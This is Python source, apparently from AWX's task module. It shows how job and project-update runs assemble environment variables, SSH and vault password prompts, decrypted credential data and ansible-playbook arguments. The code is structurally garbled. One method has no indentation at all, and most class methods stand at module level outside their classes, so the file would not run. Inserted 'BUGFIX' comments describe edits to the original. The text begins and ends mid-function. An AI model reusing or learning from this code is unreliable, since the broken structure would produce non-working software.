            env = self.build_env(self.instance, private_data_dir, private_data_files=private_data_files)
            # safe_env holds a password-redacted copy for persistence/display.
            self.safe_env = build_safe_env(env)
            credentials = self.build_credentials_list(self.instance)
            for credential in credentials:
                if credential:
                    credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
            self.safe_env.update(self.safe_cred_env)
            self.write_args_file(private_data_dir, args)
            password_prompts = self.get_password_prompts(passwords)
            expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
            params = {
                'ident': self.instance.id,
                'private_data_dir': private_data_dir,
                'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
                'inventory': self.build_inventory(self.instance, private_data_dir),
                'passwords': expect_passwords,
                'envvars': env,
                'settings': {
                    'job_timeout': self.get_instance_timeout(self.instance),
                    'suppress_ansible_output': True,
                },
            }
            if isinstance(self.instance, AdHocCommand):
                params['module'] = self.build_module_name(self.instance)
                params['module_args'] = self.build_module_args(self.instance)
            if getattr(self.instance, 'use_fact_cache', False):
                # Enable Ansible fact cache.
                params['fact_cache_type'] = 'jsonfile'
            else:
                # Disable Ansible fact cache.
                params['fact_cache_type'] = ''
            if self.instance.is_container_group_task or settings.IS_K8S:
                params['envvars'].pop('HOME', None)
            '''
            Delete parameters if the values are None or empty array
            '''
            for v in ['passwords', 'playbook', 'inventory']:
                if not params[v]:
                    del params[v]
            self.dispatcher = CallbackQueueDispatcher()
            self.instance.log_lifecycle("running_playbook")
            # SystemJobs run in-process; everything else goes through Receptor.
            if isinstance(self.instance, SystemJob):
                res = ansible_runner.interface.run(
                    project_dir=settings.BASE_DIR,
                    event_handler=self.event_handler,
                    finished_callback=self.finished_callback,
                    status_handler=self.status_handler,
                    **params,
                )
            else:
                receptor_job = AWXReceptorJob(self, params)
                res = receptor_job.run()
                self.unit_id = receptor_job.unit_id
                if not res:
                    return
            status = res.status
            rc = res.rc
            if status == 'timeout':
                self.instance.job_explanation = "Job terminated due to timeout"
                status = 'failed'
                extra_update_fields['job_explanation'] = self.instance.job_explanation
                # ensure failure notification sends even if playbook_on_stats event is not triggered
                handle_success_and_failure_notifications.apply_async([self.instance.job.id])
        except Exception:
            # this could catch programming or file system errors
            extra_update_fields['result_traceback'] = traceback.format_exc()
            logger.exception('%s Exception occurred while running task', self.instance.log_format)
        finally:
            logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.event_ct)
        try:
            self.post_run_hook(self.instance, status)
        except PostRunError as exc:
            # A post-run hook may downgrade a successful run with its own
            # status and explanation.
            if status == 'successful':
                status = exc.status
                extra_update_fields['job_explanation'] = exc.args[0]
                if exc.tb:
                    extra_update_fields['result_traceback'] = exc.tb
        except Exception:
            logger.exception('{} Post run hook errored.'.format(self.instance.log_format))
        self.instance = self.update_model(pk)
        self.instance = self.update_model(pk, status=status, emitted_events=self.event_ct, **extra_update_fields)
        try:
            self.final_run_hook(self.instance, status, private_data_dir, fact_modification_times)
        except Exception:
            logger.exception('{} Final run hook errored.'.format(self.instance.log_format))
        self.instance.websocket_emit_status(status)
        if status != 'successful':
            if status == 'canceled':
                raise AwxTaskError.TaskCancel(self.instance, rc)
            else:
                raise AwxTaskError.TaskError(self.instance, rc)
@task(queue=get_local_queuename)
class RunJob(BaseTask):
    """
    Run a job using ansible-playbook.
    """

    model = Job  # UnifiedJob subclass handled by this task
    event_model = JobEvent
    event_data_key = 'job_id'  # key stamped onto every emitted event
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
    def build_passwords(self, job, runtime_passwords):
        """
        Build a dictionary of passwords for SSH private key, SSH user, sudo/su
        and ansible-vault.

        Runtime-supplied passwords take precedence over stored credential
        inputs; values of '' or 'ASK' are never recorded. Vault credentials
        with a vault_id get their own 'vault_password.<id>' key, and two vault
        credentials may not share the same prompt.
        """
        passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
        cred = job.machine_credential
        if cred:
            for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
                # The stored input for ssh_password is named 'password'.
                value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
                if value not in ('', 'ASK'):
                    passwords[field] = value
        for cred in job.vault_credentials:
            field = 'vault_password'
            vault_id = cred.get_input('vault_id', default=None)
            if vault_id:
                field = 'vault_password.{}'.format(vault_id)
                if field in passwords:
                    raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
            value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
            if value not in ('', 'ASK'):
                passwords[field] = value
        '''
        Only 1 value can be provided for a unique prompt string. Prefer ssh
        key unlock over network key unlock.
        '''
        if 'ssh_key_unlock' not in passwords:
            for cred in job.network_credentials:
                if cred.inputs.get('ssh_key_unlock'):
                    passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
                    break
        return passwords
def build_env(self, job, private_data_dir, private_data_files=None):
    """
    Build environment dictionary for ansible-playbook.

    Adds job/inventory identifiers for the callback plugins, a per-job
    ControlPath socket directory, cloud/network credential variables, and
    collection/role search paths.

    :param job: the Job model instance being run
    :param private_data_dir: the ansible-runner private data directory
    :param private_data_files: mapping produced by build_private_data_files;
        ``private_data_files['credentials']`` maps credential -> file path
    """
    env = super(RunJob, self).build_env(job, private_data_dir, private_data_files=private_data_files)
    if private_data_files is None:
        private_data_files = {}
    # Set environment variables needed for inventory and job event
    # callbacks to work.
    env['JOB_ID'] = str(job.pk)
    env['INVENTORY_ID'] = str(job.inventory.pk)
    if job.project:
        env['PROJECT_REVISION'] = job.project.scm_revision
    env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
    env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
    if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
        env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
    env['AWX_HOST'] = settings.TOWER_URL_BASE

    # Create a directory for ControlPath sockets that is unique to each job
    cp_dir = os.path.join(private_data_dir, 'cp')
    if not os.path.exists(cp_dir):
        os.mkdir(cp_dir, 0o700)
    # FIXME: more elegant way to manage this path in container
    env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'

    # Set environment variables for cloud credentials.
    cred_files = private_data_files.get('credentials', {})
    for cloud_cred in job.cloud_credentials:
        if cloud_cred and cloud_cred.credential_type.namespace == 'openstack' and cred_files.get(cloud_cred, ''):
            env['OS_CLIENT_CONFIG_FILE'] = to_container_path(cred_files.get(cloud_cred, ''), private_data_dir)

    for network_cred in job.network_credentials:
        env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
        env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
        ssh_keyfile = cred_files.get(network_cred, '')
        if ssh_keyfile:
            env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
        authorize = network_cred.get_input('authorize', default=False)
        env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
        if authorize:
            env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')

    path_vars = (
        ('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
        ('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
    )
    config_values = read_ansible_config(job.project.get_project_path(), [pv[1] for pv in path_vars])
    for env_key, config_setting, folder, default in path_vars:
        paths = default.split(':')
        # Prepend a user-supplied search path (from the env or ansible.cfg)
        # once, if it contributes anything beyond the defaults.  BUGFIX: the
        # original prepended the whole value once per missing component,
        # producing duplicated entries in the final variable.
        if env_key in env:
            if any(path not in paths for path in env[env_key].split(':')):
                paths = [env[env_key]] + paths
        elif config_setting in config_values:
            if any(path not in paths for path in config_values[config_setting].split(':')):
                paths = [config_values[config_setting]] + paths
    # The requirements folder staged by the project sync always comes first.
        paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
        env[env_key] = os.pathsep.join(paths)

    return env
def build_args(self, job, private_data_dir, passwords):
    """
    Build command line argument list for running ansible-playbook,
    optionally using ssh-agent for public/private key authentication.

    :param job: the Job model instance being run
    :param private_data_dir: unused here, part of the hook signature
    :param passwords: dict from build_passwords; presence of keys controls
        which --ask-* prompts are requested
    :returns: list of CLI arguments
    """
    creds = job.machine_credential
    # Collect SSH/become settings from the machine credential, if any.
    # NOTE: the original code had an else-branch resetting become_method to
    # None and become_username to "" — both already falsy — so it was dead
    # code and has been removed.
    ssh_username, become_username, become_method = '', '', ''
    if creds:
        ssh_username = creds.get_input('username', default='')
        become_method = creds.get_input('become_method', default='')
        become_username = creds.get_input('become_username', default='')
    # Always specify the normal SSH user as root by default.  Since this
    # task is normally running in the background under a service account,
    # it doesn't make sense to rely on ansible-playbook's default of using
    # the current user.
    ssh_username = ssh_username or 'root'
    args = []
    if job.job_type == 'check':
        args.append('--check')
    args.extend(['-u', sanitize_jinja(ssh_username)])
    if 'ssh_password' in passwords:
        args.append('--ask-pass')
    if job.become_enabled:
        args.append('--become')
    if job.diff_mode:
        args.append('--diff')
    if become_method:
        args.extend(['--become-method', sanitize_jinja(become_method)])
    if become_username:
        args.extend(['--become-user', sanitize_jinja(become_username)])
    if 'become_password' in passwords:
        args.append('--ask-become-pass')

    # Support prompting for multiple vault passwords
    for k in passwords:
        if k.startswith('vault_password'):
            if k == 'vault_password':
                args.append('--ask-vault-pass')
            else:
                # split only on the first dot in case the vault ID itself contains a dot
                vault_id = k.split('.', 1)[1]
                args.append('--vault-id')
                args.append('{}@prompt'.format(vault_id))

    if job.forks:
        if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
            logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
            args.append('--forks=%d' % settings.MAX_FORKS)
        else:
            args.append('--forks=%d' % job.forks)
    if job.force_handlers:
        args.append('--force-handlers')
    if job.limit:
        args.extend(['-l', job.limit])
    if job.verbosity:
        # ansible-playbook caps out at -vvvvv
        args.append('-%s' % ('v' * min(5, job.verbosity)))
    if job.job_tags:
        args.extend(['-t', job.job_tags])
    if job.skip_tags:
        args.append('--skip-tags=%s' % job.skip_tags)
    if job.start_at_task:
        args.append('--start-at-task=%s' % job.start_at_task)
    return args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
    """Return the playbook path recorded on the job, unmodified."""
    return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
    """
    Write the extra-vars file for this job: AWX meta vars merged with the
    job's own (decrypted) extra_vars.
    """
    combined_vars = job.awx_meta_vars()
    if job.extra_vars_dict:
        combined_vars.update(json.loads(job.decrypted_extra_vars()))
    # By default, all extra vars disallow Jinja2 template usage for
    # security reasons; top level key-values defined in JT.extra_vars,
    # however, are allowed as "safe" (they can only be set by users with
    # higher levels of privilege — those able to create/edit Job Templates).
    if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
        jinja_safe_vars = job.job_template.extra_vars_dict
    else:
        jinja_safe_vars = {}
    return self._write_extra_vars_file(private_data_dir, combined_vars, jinja_safe_vars)
def build_credentials_list(self, job):
    """Return every credential attached to the job, with input sources prefetched."""
    creds_qs = job.credentials.prefetch_related('input_sources__source_credential')
    return creds_qs.all()
def get_password_prompts(self, passwords=None):
    """
    Map interactive prompt regexes to the password-dict key whose value
    should be written when that prompt appears on stdout.

    :param passwords: optional dict from build_passwords; namespaced
        'vault_password.<id>' keys get their own per-id prompt patterns.
        (Fixed: the default was a shared mutable ``{}``.)
    """
    if passwords is None:
        passwords = {}
    d = super(RunJob, self).get_password_prompts(passwords)
    d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
    d[r'Bad passphrase, try again for .*:\s*?$'] = ''
    for method in PRIVILEGE_ESCALATION_METHODS:
        d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
        d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
    d[r'BECOME password.*:\s*?$'] = 'become_password'
    d[r'SSH password:\s*?$'] = 'ssh_password'
    d[r'Password:\s*?$'] = 'ssh_password'
    d[r'Vault password:\s*?$'] = 'vault_password'
    for k in passwords:
        if k.startswith('vault_password.'):
            # split only on the first dot in case the vault ID itself contains a dot
            vault_id = k.split('.', 1)[1]
            d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
    return d
def build_execution_environment_params(self, instance, private_data_dir):
    """
    Extend the base EE params with a bind-mount of the Insights system-id
    directory when fact caching is enabled and the directory exists.
    K8S deployments return no extra params.
    """
    if settings.IS_K8S:
        return {}

    params = super(RunJob, self).build_execution_environment_params(instance, private_data_dir)
    # If this has an insights agent and it is not already mounted then show it
    insights_dir = os.path.dirname(settings.INSIGHTS_SYSTEM_ID_FILE)
    if instance.use_fact_cache and os.path.exists(insights_dir):
        # Fix: replaced a leftover debug message ('not parent of others')
        # with something meaningful.
        logger.info('Mounting insights directory %s into the execution environment', insights_dir)
        params.setdefault('container_volume_mounts', [])
        params['container_volume_mounts'].extend(
            [
                f"{insights_dir}:{insights_dir}:Z",
            ]
        )
    return params
def pre_run_hook(self, job, private_data_dir):
    """
    Validate the job and bring the project source tree up to date before
    the main run.

    Fails the job early if it lacks an inventory, project, or execution
    environment, or if the project update previously failed.  Then decides
    whether a local project sync (and role/collection install) is needed,
    runs it inline if so, and otherwise copies the existing local tree
    into the job's private data dir.
    """
    super(RunJob, self).pre_run_hook(job, private_data_dir)
    # Hard preconditions: fail (or error) the job before doing any work.
    if job.inventory is None:
        error = _('Job could not start because it does not have a valid inventory.')
        self.update_model(job.pk, status='failed', job_explanation=error)
        raise RuntimeError(error)
    elif job.project is None:
        error = _('Job could not start because it does not have a valid project.')
        self.update_model(job.pk, status='failed', job_explanation=error)
        raise RuntimeError(error)
    elif job.execution_environment is None:
        error = _('Job could not start because no Execution Environment could be found.')
        self.update_model(job.pk, status='error', job_explanation=error)
        raise RuntimeError(error)
    elif job.project.status in ('error', 'failed'):
        msg = _('The project revision for this job template is unknown due to a failed update.')
        job = self.update_model(job.pk, status='failed', job_explanation=msg)
        raise RuntimeError(msg)

    project_path = job.project.get_project_path(check_if_exists=False)
    job_revision = job.project.scm_revision
    sync_needs = []
    source_update_tag = 'update_{}'.format(job.project.scm_type)
    # A branch override means the job runs a branch other than the project's.
    branch_override = bool(job.scm_branch and job.scm_branch != job.project.scm_branch)
    # Decide whether the source tree must be (re)synced from the remote.
    if not job.project.scm_type:
        pass  # manual projects are not synced, user has responsibility for that
    elif not os.path.exists(project_path):
        logger.debug('Performing fresh clone of {} on this instance.'.format(job.project))
        sync_needs.append(source_update_tag)
    elif job.project.scm_type == 'git' and job.project.scm_revision and (not branch_override):
        try:
            git_repo = git.Repo(project_path)
            if job_revision == git_repo.head.commit.hexsha:
                logger.debug('Skipping project sync for {} because commit is locally available'.format(job.log_format))
            else:
                sync_needs.append(source_update_tag)
        except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
            logger.debug('Needed commit for {} not in local source tree, will sync with remote'.format(job.log_format))
            sync_needs.append(source_update_tag)
    else:
        logger.debug('Project not available locally, {} will sync with remote'.format(job.log_format))
        sync_needs.append(source_update_tag)
    has_cache = os.path.exists(os.path.join(job.project.get_cache_path(), job.project.cache_id))
    # Galaxy requirements are not supported for manual projects
    if job.project.scm_type and ((not has_cache) or branch_override):
        sync_needs.extend(['install_roles', 'install_collections'])

    if sync_needs:
        pu_ig = job.instance_group
        pu_en = Instance.objects.me().hostname
        # Fields applied eagerly to the inline project update record.
        sync_metafields = dict(
            launch_type="sync",
            job_type='run',
            job_tags=','.join(sync_needs),
            status='running',
            instance_group=pu_ig,
            execution_node=pu_en,
            celery_task_id=job.celery_task_id,
        )
        if branch_override:
            sync_metafields['scm_branch'] = job.scm_branch
            sync_metafields['scm_clean'] = True  # to accommodate force pushes
        if 'update_' not in sync_metafields['job_tags']:
            # No remote fetch requested: pin the sync to the known revision.
            sync_metafields['scm_revision'] = job_revision
        local_project_sync = job.project.create_project_update(_eager_fields=sync_metafields)
        create_partition(local_project_sync.event_class._meta.db_table, start=local_project_sync.created)
        # save the associated job before calling run() so that a
        # cancel() call on the job can cancel the project update
        job = self.update_model(job.pk, project_update=local_project_sync)

        project_update_task = local_project_sync._get_task_class()
        try:
            # the job private_data_dir is passed so sync can download roles and collections there
            sync_task = project_update_task(job_private_data_dir=private_data_dir)
            sync_task.run(local_project_sync.id)
            local_project_sync.refresh_from_db()
            job = self.update_model(job.pk, scm_revision=local_project_sync.scm_revision)
        except Exception:
            local_project_sync.refresh_from_db()
            if local_project_sync.status != 'canceled':
                job = self.update_model(
                    job.pk,
                    status='failed',
                    job_explanation=(
                        'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
                        % ('project_update', local_project_sync.name, local_project_sync.id)
                    ),
                )
            raise
        job.refresh_from_db()
        if job.cancel_flag:
            return
    else:
        # Case where a local sync is not needed, meaning that local tree is
        # up-to-date with project, job is running project current version
        if job_revision:
            job = self.update_model(job.pk, scm_revision=job_revision)
        # Project update does not copy the folder, so copy here
        RunProjectUpdate.make_local_copy(job.project, private_data_dir, scm_revision=job_revision)

    if job.inventory.kind == 'smart':
        # cache smart inventory memberships so that the host_filter query is not
        # ran inside of the event saving code
        update_smart_memberships_for_inventory(job.inventory)
def final_run_hook(self, job, status, private_data_dir, fact_modification_times):
    """
    Post-run cleanup: persist the fact cache (if enabled) and queue a
    recompute of the job's inventory computed fields.
    """
    super(RunJob, self).final_run_hook(job, status, private_data_dir, fact_modification_times)
    if not private_data_dir:
        # If there's no private data dir, that means we didn't get into the
        # actual `run()` call; this _usually_ means something failed in
        # the pre_run_hook method
        return
    if job.use_fact_cache:
        fact_cache_dir = os.path.join(private_data_dir, 'artifacts', 'fact_cache')
        job.finish_job_fact_cache(fact_cache_dir, fact_modification_times)
    try:
        inventory = job.inventory
    except Inventory.DoesNotExist:
        return
    if inventory is not None:
        update_inventory_computed_fields.delay(inventory.id)
@task(queue=get_local_queuename)
class RunProjectUpdate(BaseTask):
    """Task that runs a project update (SCM sync) via ansible-playbook."""

    model = ProjectUpdate
    event_model = ProjectUpdateEvent
    event_data_key = 'project_update_id'

    def __init__(self, *args, job_private_data_dir=None, **kwargs):
        super(RunProjectUpdate, self).__init__(*args, **kwargs)
        # Revision reported back by the playbook via set_fact (see event_handler).
        self.playbook_new_revision = None
        # Branch the repo was on before a branch-override run; restored in post_run_hook.
        self.original_branch = None
        # When this sync runs on behalf of a job, the job's private data dir
        # (used by post_run_hook to copy project content for the job).
        self.job_private_data_dir = job_private_data_dir
def event_handler(self, event_data):
    """Watch playbook events for a set_fact of 'scm_version' and record it."""
    super(RunProjectUpdate, self).event_handler(event_data)
    payload = event_data.get('event_data', {})
    if payload.get('task_action', '') != 'set_fact':
        return
    facts = payload.get('res', {}).get('ansible_facts', {})
    if 'scm_version' in facts:
        self.playbook_new_revision = facts['scm_version']
def build_private_data(self, project_update, private_data_dir):
    """
    Return SSH private key data needed for this project update.

    Returns a dict of the form
        {'credentials': {<awx.main.models.Credential>: <decrypted ssh_key_data>}}
    The inner mapping is empty when the update has no credential or the
    credential carries no ssh_key_data.
    """
    collected = {'credentials': {}}
    cred = project_update.credential
    if cred and cred.has_input('ssh_key_data'):
        collected['credentials'][cred] = cred.get_input('ssh_key_data', default='')
    return collected
def build_passwords(self, project_update, runtime_passwords):
    """
    Build a dictionary of passwords for SSH private key unlock and SCM
    username/password.
    """
    passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
    credential = project_update.credential
    if credential:
        # Map password-dict keys to the credential input they come from.
        for pw_key, input_name in (
            ('scm_key_unlock', 'ssh_key_unlock'),
            ('scm_username', 'username'),
            ('scm_password', 'password'),
        ):
            passwords[pw_key] = credential.get_input(input_name, default='')
    return passwords
def build_env(self, project_update, private_data_dir, private_data_files=None):
    """
    Build environment dictionary for ansible-playbook.

    Disables interactive prompting and retry files, points the tmpdir at
    the isolation base path, and configures one ANSIBLE_GALAXY_SERVER_*
    block per Galaxy credential on the project's organization (in order).
    """
    env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, private_data_files=private_data_files)
    env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
    env['ANSIBLE_ASK_PASS'] = str(False)
    env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
    env['DISPLAY'] = ''  # Prevent stupid password popup when running tests.
    # give ansible a hint about the intended tmpdir to work around issues
    # like https://github.com/ansible/ansible/issues/30064
    env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
    env['PROJECT_UPDATE_ID'] = str(project_update.pk)
    if settings.GALAXY_IGNORE_CERTS:
        # BUGFIX: environment variable values must be strings; the original
        # assigned the bool True here (note str(False) used above).
        env['ANSIBLE_GALAXY_IGNORE'] = str(True)

    # build out env vars for Galaxy credentials (in order)
    galaxy_server_list = []
    if project_update.project.organization:
        for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
            env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
            auth_url = cred.get_input('auth_url', default=None)
            token = cred.get_input('token', default=None)
            if token:
                env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
            if auth_url:
                env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
            galaxy_server_list.append(f'server{i}')

    if galaxy_server_list:
        env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)

    return env
def _build_scm_url_extra_vars(self, project_update):
    """
    Helper method to build SCM url and extra vars with parameters needed
    for authentication.

    Returns (scm_url, extra_vars).  Note the sentinel use of ``False`` for
    scm_username/scm_password below: it tells update_scm_url to strip that
    component from the rebuilt URL, while '' means "not provided".
    """
    extra_vars = {}
    if project_update.credential:
        scm_username = project_update.credential.get_input('username', default='')
        scm_password = project_update.credential.get_input('password', default='')
    else:
        scm_username = ''
        scm_password = ''
    scm_type = project_update.scm_type
    scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
    scm_url_parts = urlparse.urlsplit(scm_url)
    # Prefer the username/password in the URL, if provided.
    scm_username = scm_url_parts.username or scm_username
    scm_password = scm_url_parts.password or scm_password
    if scm_username:
        if scm_type == 'svn':
            # svn auth is passed to the playbook via extra vars, not the URL.
            extra_vars['scm_username'] = scm_username
            extra_vars['scm_password'] = scm_password
            scm_password = False
            if scm_url_parts.scheme != 'svn+ssh':
                scm_username = False
        elif scm_url_parts.scheme.endswith('ssh'):
            # ssh URLs never embed a password.
            scm_password = False
        elif scm_type in ('insights', 'archive'):
            extra_vars['scm_username'] = scm_username
            extra_vars['scm_password'] = scm_password
        scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
    else:
        scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
    # Pass the extra accept_hostkey parameter to the git module.
    if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
        extra_vars['scm_accept_hostkey'] = 'true'
    return scm_url, extra_vars
def build_inventory(self, instance, private_data_dir):
    """Project updates always run against localhost only."""
    return 'localhost,'
def build_args(self, project_update, private_data_dir, passwords):
    """
    Build command line argument list for running ansible-playbook,
    optionally using ssh-agent for public/private key authentication.
    """
    verbose = getattr(settings, 'PROJECT_UPDATE_VVV', False)
    args = ['-vvv'] if verbose else []
    if project_update.job_tags:
        args += ['-t', project_update.job_tags]
    return args
def build_extra_vars_file(self, project_update, private_data_dir):
    """
    Write the extra-vars file consumed by the project_update.yml playbook:
    SCM url/auth vars, the branch or revision to check out, and feature
    flags for role/collection installs.
    """
    extra_vars = {}
    scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
    extra_vars.update(extra_vars_new)

    # Choose what to check out: for a job-run sync without branch override,
    # pin to the project's known revision; otherwise fall back to HEAD.
    scm_branch = project_update.scm_branch
    if project_update.job_type == 'run' and (not project_update.branch_override):
        if project_update.project.scm_revision:
            scm_branch = project_update.project.scm_revision
        elif not scm_branch:
            raise RuntimeError('Could not determine a revision to run from project.')
    elif not scm_branch:
        scm_branch = 'HEAD'

    galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
    if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
        logger.warning('Galaxy role/collection syncing is enabled, but no ' f'credentials are configured for {project_update.project.organization}.')

    extra_vars.update(
        {
            'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
            'local_path': os.path.basename(project_update.project.local_path),
            'project_path': project_update.get_project_path(check_if_exists=False),  # deprecated
            'insights_url': settings.INSIGHTS_URL_BASE,
            'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
            'awx_version': get_awx_version(),
            'scm_url': scm_url,
            'scm_branch': scm_branch,
            'scm_clean': project_update.scm_clean,
            'scm_track_submodules': project_update.scm_track_submodules,
            'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
            'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
        }
    )
    # apply custom refspec from user for PR refs and the like
    if project_update.scm_refspec:
        extra_vars['scm_refspec'] = project_update.scm_refspec
    elif project_update.project.allow_override:
        # If branch is override-able, do extra fetch for all branches
        extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'

    if project_update.scm_type == 'archive':
        # for raw archive, prevent error moving files between volumes
        extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')

    self._write_extra_vars_file(private_data_dir, extra_vars)
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
    """Project updates always run the bundled project_update.yml playbook."""
    # Fix: the original wrapped this constant in a pointless single-argument
    # os.path.join call.
    return 'project_update.yml'
def get_password_prompts(self, passwords=None):
    """
    Map interactive SCM prompt regexes to the password-dict key (or literal
    answer) to send when the prompt appears.
    (Fixed: the default was a shared mutable ``{}``.)
    """
    if passwords is None:
        passwords = {}
    d = super(RunProjectUpdate, self).get_password_prompts(passwords)
    d[r'Username for.*:\s*?$'] = 'scm_username'
    d[r'Password for.*:\s*?$'] = 'scm_password'
    d[r'Password:\s*?$'] = 'scm_password'
    d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
    d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
    d[r'Bad passphrase, try again for .*:\s*?$'] = ''
    # FIXME: Configure whether we should auto accept host keys?
    d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
    return d
def _update_dependent_inventories(self, project_update, dependent_inventory_sources):
    """
    Run inventory updates inline for SCM inventory sources that depend on
    this project, skipping sources that are unchanged or already updating.
    Cancellation of the project update stops processing further sources.
    """
    scm_revision = project_update.project.scm_revision
    inv_update_class = InventoryUpdate._get_task_class()
    for inv_src in dependent_inventory_sources:
        if not inv_src.update_on_project_update:
            continue
        if inv_src.scm_last_revision == scm_revision:
            logger.debug('Skipping SCM inventory update for `{}` because ' 'project has not changed.'.format(inv_src.name))
            continue
        logger.debug('Local dependent inventory update for `{}`.'.format(inv_src.name))
        # Create the inventory update record atomically so the "already
        # active" check and the creation cannot race.
        with transaction.atomic():
            if InventoryUpdate.objects.filter(inventory_source=inv_src, status__in=ACTIVE_STATES).exists():
                logger.debug('Skipping SCM inventory update for `{}` because ' 'another update is already active.'.format(inv_src.name))
                continue
            if settings.IS_K8S:
                instance_group = InventoryUpdate(inventory_source=inv_src).preferred_instance_groups[0]
            else:
                instance_group = project_update.instance_group
            local_inv_update = inv_src.create_inventory_update(
                _eager_fields=dict(
                    launch_type='scm',
                    status='running',
                    instance_group=instance_group,
                    execution_node=project_update.execution_node,
                    source_project_update=project_update,
                    celery_task_id=project_update.celery_task_id,
                )
            )
        try:
            create_partition(local_inv_update.event_class._meta.db_table, start=local_inv_update.created)
            inv_update_class().run(local_inv_update.id)
        except Exception:
            # Best-effort: log and continue with the remaining sources.
            logger.exception('{} Unhandled exception updating dependent SCM inventory sources.'.format(project_update.log_format))

        try:
            project_update.refresh_from_db()
        except ProjectUpdate.DoesNotExist:
            logger.warning('Project update deleted during updates of dependent SCM inventory sources.')
            break
        try:
            local_inv_update.refresh_from_db()
        except InventoryUpdate.DoesNotExist:
            logger.warning('%s Dependent inventory update deleted during execution.', project_update.log_format)
            continue
        if project_update.cancel_flag:
            logger.info('Project update {} was canceled while updating dependent inventories.'.format(project_update.log_format))
            break
        if local_inv_update.cancel_flag:
            logger.info('Continuing to process project dependencies after {} was canceled'.format(local_inv_update.log_format))
        if local_inv_update.status == 'successful':
            # Record the revision so the next sync can skip this source.
            inv_src.scm_last_revision = scm_revision
            inv_src.save(update_fields=['scm_last_revision'])
def release_lock(self, instance):
    """Unlock and close the project lock file descriptor acquired in acquire_lock."""
    fd = self.lock_fd
    try:
